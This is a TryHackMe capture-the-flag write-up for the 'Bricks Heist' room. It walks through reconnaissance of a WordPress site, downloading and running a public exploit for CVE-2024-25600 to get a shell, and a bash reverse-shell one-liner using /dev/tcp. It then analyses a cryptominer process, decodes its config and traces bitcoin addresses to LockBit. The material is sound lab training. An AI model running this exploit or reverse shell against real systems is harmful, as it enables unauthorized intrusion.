
THM Diary


TryHack3M: Bricks Heist

First, add the IP of bricks.thm to /etc/hosts

cd /etc
echo "10.10.182.111 bricks.thm" >>hosts
cat hosts

Then scan the ports with nmap

nmap -sV bricks.thm

Ports 22, 80, 443 and 3306 are open

Opening the site shows it is running WordPress

Scan it with wpscan

wpscan --url https://bricks.thm --disable-tls-checks

WordPress Bricks theme 1.9.5

There is a CVE for it: CVE-2024-25600

https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT

wget https://raw.githubusercontent.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT/main/CVE-2024-25600.py

python3 CVE-2024-25600.py -u https://bricks.thm

Got a shell

cat 650c844110baced87e1606453b93f22a.txt

Look for suspicious processes

systemctl | grep running

The following command reveals the name of the suspicious process

systemctl status ubuntu.service

Using the shell obtained earlier, start an nc listener and catch a reverse shell

bash -c 'exec bash -i &>/dev/tcp/ip/port <&1'

From the previous step we know the process name is nm-inet-dialog

Its directory is shown below

ls -la

The inet.conf file is found there

head inet.conf

It prints a string of hexadecimal characters; after decoding two layers of base64 we get a readable string
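As an added example (not code from the post or the room), a small Python decoder that peels the hex and base64 layers off a value like the one found in inet.conf. The post does not quote the actual string, so the block builds a constructed sample by wrapping the recovered address in two base64 layers and then hex; that layering order, and the printable-ASCII stop condition, are assumptions.

```python
import base64
import binascii
import re
import string

SAMPLE_ADDRESS = "bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa"  # address from the post; used only to build a constructed sample
HEX_RE = re.compile(r"[0-9a-fA-F]+")
B64_RE = re.compile(r"[A-Za-z0-9+/=]+")
PRINTABLE = set(string.printable)


def is_printable(data: bytes) -> bool:
    """True if the bytes decode as ASCII and every character is printable."""
    try:
        return all(c in PRINTABLE for c in data.decode("ascii"))
    except UnicodeDecodeError:
        return False


def peel_layers(blob: str, max_layers: int = 6):
    """Strip hex and base64 layers one at a time while each layer still
    decodes to printable text; returns (plaintext, [layer names]).
    Heuristic: plaintext that happens to be valid base64 would be decoded
    once more, so max_layers bounds the loop."""
    layers = []
    cur = "".join(blob.split())  # drop whitespace and newlines from the file
    for _ in range(max_layers):
        decoded = name = None
        if len(cur) % 2 == 0 and HEX_RE.fullmatch(cur):
            cand = bytes.fromhex(cur)
            if is_printable(cand):
                decoded, name = cand, "hex"
        if decoded is None and B64_RE.fullmatch(cur):
            try:
                cand = base64.b64decode(cur, validate=True)
                if is_printable(cand):
                    decoded, name = cand, "base64"
            except (binascii.Error, ValueError):
                pass
        if decoded is None:
            break
        layers.append(name)
        cur = decoded.decode("ascii")
    return cur, layers


def encode_sample(text: str = SAMPLE_ADDRESS) -> str:
    """Constructed sample: base64 twice, then hex, mimicking the inet.conf value."""
    inner = base64.b64encode(text.encode()).decode()
    outer = base64.b64encode(inner.encode()).decode()
    return outer.encode().hex()
```

Running `peel_layers(encode_sample())` returns the address together with the layer sequence `["hex", "base64", "base64"]`, which is also a useful way to document how a config value was obfuscated in an incident report.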

Go to the blockchain.com explorer

bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa

https://www.blockchain.com/explorer/addresses/btc/bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa

Copy the address the funds came from

bc1q5jqgm7nvrhaw2rh2vk0dk8e4gg5g373g0vz07r

https://ofac.treasury.gov/recent-actions/20240220

Here we find that the group behind them is LockBit
